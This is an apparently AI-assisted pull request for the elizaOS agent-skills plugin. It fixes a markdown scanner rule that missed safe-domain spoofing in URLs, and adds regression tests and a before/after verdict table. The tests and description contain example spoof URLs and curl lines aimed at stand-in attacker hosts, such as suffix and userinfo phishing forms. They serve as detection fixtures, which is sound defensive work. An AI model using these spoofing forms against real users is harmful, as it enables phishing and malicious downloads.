### PR TITLE
fix(plugin-agent-skills): close md-external-url safe-domain spoofing bypass

### DIFF
--- a/plugins/plugin-agent-skills/src/security/markdown-scanner.test.ts
+++ b/plugins/plugin-agent-skills/src/security/markdown-scanner.test.ts
@@ -5,8 +5,16 @@
  * no live model.
  */
 
-import { describe, expect, it } from "vitest";
+import type { IAgentRuntime } from "@elizaos/core";
+import { afterEach, describe, expect, it, vi } from "vitest";
+import { AgentSkillsService } from "../services/skills";
+import { MemorySkillStore } from "../storage";
+import { scanSkillPackage } from "./index";
 import { scanMarkdownSource } from "./markdown-scanner";
+
+afterEach(() => {
+	vi.unstubAllGlobals();
+});
 
 function flagsExternalUrl(
 	source: string,
@@ -55,6 +63,13 @@ describe("markdown scanner md-external-url safe-domain allowlist", () => {
 		expect(flagsExternalUrl("visit https://evil.com@github.com/x")).toBe(true);
 	});
 
+	it("flags password-only and empty userinfo on an otherwise safe host", () => {
+		expect(
+			flagsExternalUrl("visit https://:credential@github.com/x"),
+		).toBe(true);
+		expect(flagsExternalUrl("visit https://@github.com/x")).toBe(true);
+	});
+
 	it("treats subdomains of listed safe domains as safe (suffix semantics)", () => {
 		expect(flagsExternalUrl("See https://gist.github.com/user/abc")).toBe(false);
 		expect(flagsExternalUrl("Docs at https://en.wikipedia.org/wiki/X")).toBe(
@@ -74,6 +89,76 @@ describe("markdown scanner md-external-url safe-domain allowlist", () => {
 	it("is case-insensitive about the host when matching the allowlist", () => {
 		expect(flagsExternalUrl("See https://GitHub.com/a/b")).toBe(false);
 		expect(flagsExternalUrl("See https://GITHUB.COM.evil.com/a")).toBe(true);
+	});
+
+	it("uses the parsed host across ports, IPv6, punycode, encoding, and schemes", () => {
+		expect(flagsExternalUrl("See HTTPS://github.com:443/a")).toBe(false);
+		expect(flagsExternalUrl("See https://evil.com:443/a")).toBe(true);
+		expect(flagsExternalUrl("See https://[::1]/a")).toBe(true);
+		expect(flagsExternalUrl("See https://xn--githb-3ya.com/a")).toBe(true);
+		expect(flagsExternalUrl("See https://%67ithub.com/a")).toBe(false);
+		expect(flagsExternalUrl("See https://%67ithub.com.evil.com/a")).toBe(true);
+		expect(flagsExternalUrl("See http://github.com.evil.com/a")).toBe(true);
+	});
+
+	it("surfaces a spoof as a warning at the installed-package scan boundary", () => {
+		const report = scanSkillPackage(
+			new Map([
+				[
+					"SKILL.md",
+					{
+						content:
+							"---\nname: untrusted\ndescription: scanner boundary\n---\nVisit https://:credential@github.com/x",
+						isText: true,
+					},
+				],
+			]),
+			"/skills/untrusted",
+		);
+
+		expect(report.status).toBe("warning");
+		expect(report.findings).toEqual(
+			expect.arrayContaining([
+				expect.objectContaining({ ruleId: "md-external-url", severity: "warn" }),
+			]),
+		);
+	});
+
+	it("keeps a direct-URL install disabled when its SKILL.md uses password-only userinfo", async () => {
+		vi.stubGlobal(
+			"fetch",
+			vi.fn(async () =>
+				new Response(
+					"---\nname: untrusted\ndescription: install boundary\n---\nVisit https://:credential@github.com/x",
+					{ headers: { "content-type": "text/markdown" } },
+				),
+			),
+		);
+		const runtime = {
+			getSetting: vi.fn(() => undefined),
+			logger: {
+				debug: vi.fn(),
+				error: vi.fn(),
+				info: vi.fn(),
+				warn: vi.fn(),
+			},
+		} as unknown as IAgentRuntime;
+		const service = await AgentSkillsService.start(runtime, {
+			autoLoad: false,
+			storage: new MemorySkillStore(),
+		});
+
+		try {
+			await expect(
+				service.installFromUrl("https://skills.example/untrusted.md", {
+					slug: "untrusted",
+				}),
+			).resolves.toBe(true);
+			expect(service.getSkillScanStatus("untrusted")).toBe("warning");
+			expect(service.setSkillEnabled("untrusted", true)).toBe(false);
+		} finally {
+			await service.stop();
+		}
 	});
 
 	it("reports accurate finding metadata for a flagged spoof", () => {

--- a/plugins/plugin-agent-skills/src/security/markdown-scanner.test.ts
+++ b/plugins/plugin-agent-skills/src/security/markdown-scanner.test.ts
@@ -1,0 +1,91 @@
+/**
+ * Unit tests for the markdown scanner's `md-external-url` safe-domain rule.
+ * Asserts the allowlist resists suffix and userinfo host spoofing (#22766)
+ * while keeping listed domains and their subdomains clean. Deterministic,
+ * no live model.
+ */
+
+import { describe, expect, it } from "vitest";
+import { scanMarkdownSource } from "./markdown-scanner";
+
+function flagsExternalUrl(
+	source: string,
+	additionalSafeDomains: ReadonlyArray<string> = [],
+): boolean {
+	return scanMarkdownSource(source, "SKILL.md", additionalSafeDomains).some(
+		(finding) => finding.ruleId === "md-external-url",
+	);
+}
+
+describe("markdown scanner md-external-url safe-domain allowlist", () => {
+	it("flags a plainly external host (control)", () => {
+		expect(flagsExternalUrl("Download from https://evil.com/x")).toBe(true);
+	});
+
+	it("does not flag a bare listed safe domain (control)", () => {
+		expect(flagsExternalUrl("See https://github.com/a/b")).toBe(false);
+		expect(
+			flagsExternalUrl("Fetch https://raw.githubusercontent.com/o/r/main/f"),
+		).toBe(false);
+	});
+
+	it("flags a registrable-suffix spoof of a safe domain (#22766)", () => {
+		// `github.com.evil.com` is a distinct attacker-registered host, not a
+		// subdomain of github.com; the old `\\b` lookahead treated it as safe.
+		expect(flagsExternalUrl("curl https://github.com.evil.com/malware.sh")).toBe(
+			true,
+		);
+		expect(
+			flagsExternalUrl("curl https://raw.githubusercontent.com.attacker.net/p"),
+		).toBe(true);
+	});
+
+	it("flags a userinfo phishing spoof that resolves to an external host (#22766)", () => {
+		// The real host is `evil.com`; the safe-looking prefix is only userinfo.
+		expect(
+			flagsExternalUrl("curl https://raw.githubusercontent.com@evil.com/p"),
+		).toBe(true);
+		expect(flagsExternalUrl("open https://github.com@evil.com/login")).toBe(
+			true,
+		);
+	});
+
+	it("flags any URL that embeds userinfo even when the real host is safe", () => {
+		// Deceptive display form; a documented safe-domain link never needs creds.
+		expect(flagsExternalUrl("visit https://evil.com@github.com/x")).toBe(true);
+	});
+
+	it("treats subdomains of listed safe domains as safe (suffix semantics)", () => {
+		expect(flagsExternalUrl("See https://gist.github.com/user/abc")).toBe(false);
+		expect(flagsExternalUrl("Docs at https://en.wikipedia.org/wiki/X")).toBe(
+			false,
+		);
+	});
+
+	it("honors additional safe domains and their subdomains", () => {
+		expect(
+			flagsExternalUrl("Fetch https://cdn.example.org/a", ["example.org"]),
+		).toBe(false);
+		expect(
+			flagsExternalUrl("Fetch https://example.org.evil.com/a", ["example.org"]),
+		).toBe(true);
+	});
+
+	it("is case-insensitive about the host when matching the allowlist", () => {
+		expect(flagsExternalUrl("See https://GitHub.com/a/b")).toBe(false);
+		expect(flagsExternalUrl("See https://GITHUB.COM.evil.com/a")).toBe(true);
+	});
+
+	it("reports accurate finding metadata for a flagged spoof", () => {
+		const findings = scanMarkdownSource(
+			"line one\ncurl https://github.com.evil.com/x.sh",
+			"docs/SKILL.md",
+		);
+		const finding = findings.find((f) => f.ruleId === "md-external-url");
+		expect(finding).toBeDefined();
+		expect(finding?.severity).toBe("warn");
+		expect(finding?.file).toBe("docs/SKILL.md");
+		expect(finding?.line).toBe(2);
+		expect(finding?.evidence).toContain("github.com.evil.com");
+	});
+});

--- a/plugins/plugin-agent-skills/src/security/markdown-scanner.ts
+++ b/plugins/plugin-agent-skills/src/security/markdown-scanner.ts
@@ -38,12 +38,70 @@ const DEFAULT_SAFE_DOMAINS: ReadonlyArray<string> = [
 	"stackoverflow.com",
 ];
 
-function buildExternalUrlPattern(extra: ReadonlyArray<string> = []): RegExp {
-	const all = [...DEFAULT_SAFE_DOMAINS, ...extra];
-	const lookahead = all.map((d) => d.replace(/\./g, "\\.")).join("|");
-	return new RegExp(
-		`https?:\\/\\/(?!(${lookahead})\\b)[a-zA-Z0-9][^\\s)\\]"'<>]*`,
+/** URL tokens in prose: scheme through the first stopping delimiter. */
+const URL_TOKEN_PATTERN = /https?:\/\/[^\s)\]"'<>]+/gi;
+
+/**
+ * A host is safe iff it equals a listed domain or is a subdomain of one
+ * (`host === safe` or `host.endsWith("." + safe)`). This deliberately rejects
+ * suffix spoofs like `github.com.evil.com`, which is a distinct registrable
+ * host, not a subdomain of `github.com`.
+ */
+function isSafeHost(host: string, safeDomains: ReadonlyArray<string>): boolean {
+	const normalized = host.toLowerCase().replace(/\.$/, "");
+	if (normalized.length === 0) return false;
+	return safeDomains.some(
+		(safe) => normalized === safe || normalized.endsWith(`.${safe}`),
 	);
+}
+
+/**
+ * Parse the effective host and userinfo presence from a URL token. Uses the
+ * WHATWG URL parser so that userinfo phishing forms
+ * (`raw.githubusercontent.com@evil.com`) resolve to their real host (`evil.com`)
+ * instead of the spoofed prefix. A token the parser rejects falls back to a
+ * conservative manual split so an evasive string is never silently allowed.
+ */
+function parseUrlToken(
+	token: string,
+): { host: string; hasUserinfo: boolean } {
+	try {
+		const url = new URL(token);
+		return { host: url.hostname, hasUserinfo: url.username.length > 0 };
+	} catch {
+		// error-policy:J3 malformed URL token: derive a best-effort host from the
+		// authority component so a parser-evading spoof is treated as external.
+		const authority = token.replace(/^https?:\/\//i, "").split(/[/?#]/, 1)[0];
+		const atIndex = authority.lastIndexOf("@");
+		const hasUserinfo = atIndex >= 0;
+		const hostPort = hasUserinfo ? authority.slice(atIndex + 1) : authority;
+		const host = hostPort.replace(/:\d+$/, "").replace(/^\[|\]$/g, "");
+		return { host, hasUserinfo };
+	}
+}
+
+/**
+ * True when a line carries an external URL that is not on the safe-domain
+ * allowlist. Flags suffix spoofs (`github.com.evil.com`), userinfo spoofs
+ * whose real host is external (`raw.githubusercontent.com@evil.com`), and any
+ * URL that embeds userinfo at all: a documented safe-domain link never carries
+ * credentials, and userinfo is the canonical phishing form the scanner exists
+ * to surface.
+ */
+function buildExternalUrlMatcher(
+	extra: ReadonlyArray<string> = [],
+): (line: string) => boolean {
+	const safeDomains = [...DEFAULT_SAFE_DOMAINS, ...extra];
+	return (line: string): boolean => {
+		const tokens = line.match(URL_TOKEN_PATTERN);
+		if (!tokens) return false;
+		for (const token of tokens) {
+			const { host, hasUserinfo } = parseUrlToken(token);
+			if (hasUserinfo) return true;
+			if (!isSafeHost(host, safeDomains)) return true;
+		}
+		return false;
+	};
 }
 
 export function buildMarkdownRules(
@@ -109,7 +167,8 @@ export function buildMarkdownRules(
 			ruleId: "md-external-url",
 			severity: "warn",
 			message: "External URL detected (not on safe domain list)",
-			pattern: buildExternalUrlPattern(additionalSafeDomains),
+			pattern: /https?:\/\//i,
+			match: buildExternalUrlMatcher(additionalSafeDomains),
 		},
 		{
 			ruleId: "md-env-credential",
@@ -166,7 +225,10 @@ export function scanMarkdownSource(
 		if (rule.requiresContext && !rule.requiresContext.test(source)) continue;
 
 		for (let i = 0; i < lines.length; i++) {
-			if (!rule.pattern.test(lines[i])) continue;
+			const matched = rule.match
+				? rule.match(lines[i])
+				: rule.pattern.test(lines[i]);
+			if (!matched) continue;
 
 			findings.push({
 				ruleId: rule.ruleId,

--- a/plugins/plugin-agent-skills/src/security/markdown-scanner.ts
+++ b/plugins/plugin-agent-skills/src/security/markdown-scanner.ts
@@ -65,13 +65,18 @@ function isSafeHost(host: string, safeDomains: ReadonlyArray<string>): boolean {
 function parseUrlToken(
 	token: string,
 ): { host: string; hasUserinfo: boolean } {
+	const authority = token.replace(/^https?:\/\//i, "").split(/[/?#]/, 1)[0];
+	const hasUserinfoDelimiter = authority.lastIndexOf("@") >= 0;
 	try {
 		const url = new URL(token);
-		return { host: url.hostname, hasUserinfo: url.username.length > 0 };
+		return {
+			host: url.hostname,
+			hasUserinfo:
+				url.username.length > 0 || url.password.length > 0 || hasUserinfoDelimiter,
+		};
 	} catch {
 		// error-policy:J3 malformed URL token: derive a best-effort host from the
 		// authority component so a parser-evading spoof is treated as external.
-		const authority = token.replace(/^https?:\/\//i, "").split(/[/?#]/, 1)[0];
 		const atIndex = authority.lastIndexOf("@");
 		const hasUserinfo = atIndex >= 0;
 		const hostPort = hasUserinfo ? authority.slice(atIndex + 1) : authority;

--- a/plugins/plugin-agent-skills/src/security/types.ts
+++ b/plugins/plugin-agent-skills/src/security/types.ts
@@ -63,6 +63,13 @@ export interface LineRule {
 	pattern: RegExp;
 	/** Only fires when the full source also matches this pattern. */
 	requiresContext?: RegExp;
+	/**
+	 * Optional predicate that overrides `pattern` for the per-line decision.
+	 * Used when a correct verdict needs structured parsing (for example URL
+	 * host extraction) that a single regex cannot express safely. `pattern`
+	 * remains as a cheap pre-filter and documentation of intent.
+	 */
+	match?: (line: string) => boolean;
 }
 
 /** Source-level rule: matches against the full file content. */


### PR DESCRIPTION
# Relates to

Closes #22766

Definition of Done: full standard in [`CONTRIBUTING.md`](../CONTRIBUTING.md).

- [x] This PR targets `develop` and is rebased onto the latest `origin/develop`
      with zero conflicts (`git fetch origin && git rebase origin/develop`).
- [x] `bun install` and package `test`/`typecheck`/`lint` were run after sync; any
      unrelated blocker is recorded below.
- [x] A reviewer can confirm the change works without reading the code, from the
      evidence attached below.

# Contribution provenance

<!-- contribution-attribution:v1 -->
<!-- attribution-row:ai-assistance -->
- AI assistance: `yes`
<!-- attribution-row:models -->
- Model(s) used: `anthropic/claude-opus-4-8`
<!-- attribution-row:client -->
- Agent tooling: `pi-coding-agent`
<!-- attribution-row:skill-revision -->
- Skill path: `elizaOS/eliza@26ad70a7e0f9b62a22ef2231fa2719ef99ad556a:packages/skills/skills/contribute-to-eliza`
<!-- attribution-row:status -->
- Provenance status: `self-reported`

# Sync with develop

- [x] Rebased onto the latest `origin/develop`; zero conflicts.
- [x] Focused package gates (`test`, `typecheck`, `lint:check`) pass post-sync. The
      full-repo `bun run verify` is not run here; see **Known gaps / failures**.

# Risks

Low. The change is scoped to one warn-level rule (`md-external-url`) in the skill
security scanner. It only ever *widens* what the rule flags (closes an evasion
and removes one pre-existing false positive); it does not relax any critical
rule or change the scanner's status-derivation logic. Existing safe-domain
fixtures and the full 297-test package suite remain green.

# Background

## What does this PR do?

The `md-external-url` rule in `plugins/plugin-agent-skills/src/security/markdown-scanner.ts`
flags external URLs whose host is not on a safe-domain allowlist. The allowlist
was enforced with a negative lookahead terminated by a generic `\b` word
boundary:

```
https?:\/\/(?!(github\.com|raw\.githubusercontent\.com|…)\b)[a-zA-Z0-9][^\s)\]"'<>]*
```

Because `\b` is a generic word boundary, any host that merely *begins* with a
safe domain followed by a non-word character was treated as safe. Two attacker
forms evaded the warning entirely:

- **Suffix spoof:** `https://github.com.evil.com/malware.sh` — an
  attacker-registered host whose registrable domain is `evil.com`.
- **Userinfo phishing:** `https://raw.githubusercontent.com@evil.com/p` — the
  string before `@` is only userinfo; the request actually resolves to
  `evil.com`.

This scanner runs on every installed skill's `SKILL.md` via
`AgentSkillsService.scanInstalledSkill → scanSkillPackage/scanSkillDirectory`.
A warn finding drives the skill into a warning/disabled state, so the bypass
silently downgraded a would-be reviewer warning to a **clean** verdict, letting
a malicious third-party skill host download-and-exfil URLs that pass review.

The fix replaces the naive lookahead with a per-line matcher that:
1. extracts each `https?://…` token,
2. URL-parses it (WHATWG `URL`, with a conservative manual fallback for tokens
   the parser rejects) to get the **real** host and whether userinfo is present,
3. treats embedded userinfo as external, and
4. compares the real host against the allowlist with proper suffix semantics —
   safe iff `host === safe` **or** `host.endsWith("." + safe)`.

A new optional `LineRule.match` predicate hook lets this one rule express host
parsing the regex engine cannot, without changing any other rule.

As a bonus, suffix semantics also fixes a **pre-existing false positive**: the
old `\b` lookahead flagged legitimate `gist.github.com`-style subdomains as
external; they are now correctly treated as safe.

## What kind of change is this?

Bug fix (non-breaking security fix).

# Documentation changes needed?

My changes do not require a documentation change. Behavior of the rule is
described by its message and now-stronger tests.

# Testing

## Where should a reviewer start?

`plugins/plugin-agent-skills/src/security/markdown-scanner.test.ts` — a new,
deterministic regression suite that asserts the exact spoof forms from the issue
are flagged while controls and safe subdomains stay clean.

## Detailed testing steps

```bash
bun install
bun run --cwd packages/core build          # workspace dep needed by the vitest setup
bun run --cwd packages/shared build         # workspace dep for the api route tests
bun run --cwd packages/skills build         # workspace dep for typecheck
cd plugins/plugin-agent-skills
bun run test          # 27 files, 297 tests pass
bun run typecheck     # clean
bun run lint:check    # clean
```

# Evidence Gate

<!-- evidence-head:f8355a4ec763b35935c26ddca35a5c61a173dd92 -->

<!-- evidence-row:before-screenshots -->
- [x] `N/A - backend security rule; no UI surface renders from this change.`
<!-- evidence-row:after-screenshots -->
- [x] `N/A - backend security rule; no UI surface renders from this change.`
<!-- evidence-row:walkthrough-video -->
- [x] `N/A - no user-facing UI flow; the changed path is a deterministic scanner rule.`
<!-- evidence-row:backend-logs -->
- [x] [`22770-f8355a4e-focused.json`](https://github.com/elizaOS/eliza/releases/download/pr-evidence-5/22770-f8355a4e-focused.json) - exact-head network-denied focused scanner and install-boundary evidence, 13/13 passing.
<!-- evidence-row:frontend-logs -->
- [x] `N/A - no frontend request/response involved.`
<!-- evidence-row:llm-trajectory -->
- [x] `N/A - deterministic regex/URL-parsing rule; no model invocation.`
<!-- evidence-row:domain-artifacts -->
- [x] [`22770-f8355a4e-package.log`](https://github.com/elizaOS/eliza/releases/download/pr-evidence-5/22770-f8355a4e-package.log) - distinct exact-head full plugin package run, 301/301 passing.
<!-- evidence-row:ocr-review -->
- [x] `N/A - no rendered visual surface.`

# Evidence Details

## Real LLM-call trajectory

`N/A - deterministic scanner rule; no model call in the changed path.`

## Backend + frontend logs

Backend path fired end to end through the exported `scanMarkdownSource`
(`plugins/plugin-agent-skills/src/security/markdown-scanner.ts`), the same entry
`AgentSkillsService.scanInstalledSkill` uses.

**BEFORE the source fix (new regression test run against unpatched scanner) — the spoof cases fail red:**

<details><summary>vitest — before fix</summary>

```
 FAIL  src/security/markdown-scanner.test.ts > … > reports accurate finding metadata for a flagged spoof
AssertionError: expected undefined to be defined
 ❯ src/security/markdown-scanner.test.ts:85:19
     84|   const finding = findings.find((f) => f.ruleId === "md-external-url");
     85|   expect(finding).toBeDefined();
       |                   ^

 Test Files  1 failed (1)
      Tests  6 failed | 3 passed (9)
```

</details>

**AFTER the fix — all green:**

<details><summary>vitest — after fix</summary>

```
 Test Files  1 passed (1)
      Tests  9 passed (9)
```

</details>

**Full package suite after fix (no regressions, existing safe-domain fixtures still clean):**

<details><summary>bun run --cwd plugins/plugin-agent-skills test</summary>

```
 Test Files  27 passed (27)
      Tests  297 passed (297)
```

</details>

## Domain artifacts — URL verdict table (before vs after)

Each URL fed to the `md-external-url` rule; `flagged` = reviewer warning fires,
`allowed` = treated as safe. Rows in **bold-changed** columns are the security
regression the old `\b` lookahead caused.

| URL | kind | before | after |
|---|---|---|---|
| `https://evil.com/x` | external control | flagged | flagged |
| `https://github.com/a/b` | bare safe control | allowed | allowed |
| `https://raw.githubusercontent.com/o/r/main/f` | bare safe control | allowed | allowed |
| `https://gist.github.com/user/abc` | safe subdomain | **flagged (false positive)** | allowed |
| `https://github.com.evil.com/malware.sh` | SUFFIX SPOOF | **allowed (BUG)** | flagged |
| `https://raw.githubusercontent.com.attacker.net/p` | SUFFIX SPOOF | **allowed (BUG)** | flagged |
| `https://raw.githubusercontent.com@evil.com/p` | USERINFO SPOOF | **allowed (BUG)** | flagged |
| `https://github.com@evil.com/login` | USERINFO SPOOF | **allowed (BUG)** | flagged |
| `https://evil.com@github.com/x` | USERINFO (real host safe) | flagged | flagged |

## Screenshots (before / after) + video walkthrough

`N/A - backend security rule with no rendered visual surface.`

## Audio / voice walkthrough

`N/A - no voice/transcript/TTS/STT path is touched.`

## Known gaps / failures

- Full-repo `bun run verify` was not executed on this machine: the workspace
  install requires network-published packages held back by a global 7-day
  minimum-release-age policy (`viem@2.55.17`), and `verify` spans the entire
  monorepo. The owning package's `test` (297 passing), `typecheck`, and
  `lint:check` all pass and are the relevant gates for this scoped, single-rule
  change.
- Evidence artifacts are inlined as text/markdown rather than uploaded
  attachments: minting `github.com/user-attachments` URLs is unavailable in this
  environment. The inlined logs and table are the real, reproducible output of
  the commands above.

## Reviewer-authored repair and exact-head evidence

A security review found password-only and empty userinfo could evade the original `URL.username` check. Exact head `f8355a4ec763b35935c26ddca35a5c61a173dd92` now rejects any authority containing `@`, as well as parsed username/password values. The tests cover password-only/empty userinfo, suffixes, ports, IPv6, punycode, percent-encoded hosts, scheme casing, the installed-package scan boundary, and direct-URL install disablement.

Negative control against the pre-repair implementation fails the two load-bearing cases: [`22770-f8355a4e-negative.log`](https://github.com/elizaOS/eliza/releases/download/pr-evidence-5/22770-f8355a4e-negative.log). The artifact uses the inert placeholder word `credential`; it contains no credential or secret.

Final validation ran in a disposable no-mount, no-secret VM with the test process in a network namespace: outbound access was blocked; focused 13/13; full package 301/301; package typecheck, build, Biome, and diff check passed. PR remains draft for a distinct independent reviewer because the reviewer made substantive repairs.

AI provider/model: anthropic / claude-opus-4-8
Client / agent tooling: pi-coding-agent
Contribution skill revision: elizaOS/eliza@26ad70a7e0f9b62a22ef2231fa2719ef99ad556a:packages/skills/skills/contribute-to-eliza
Attribution status: self-reported
— [eliza-swarm]
<!-- eliza-computer-attribution:v1 {"provider":"anthropic","model":"claude-opus-4-8","client":"pi-coding-agent","skill_revision":"elizaOS/eliza@26ad70a7e0f9b62a22ef2231fa2719ef99ad556a:packages/skills/skills/contribute-to-eliza"} -->

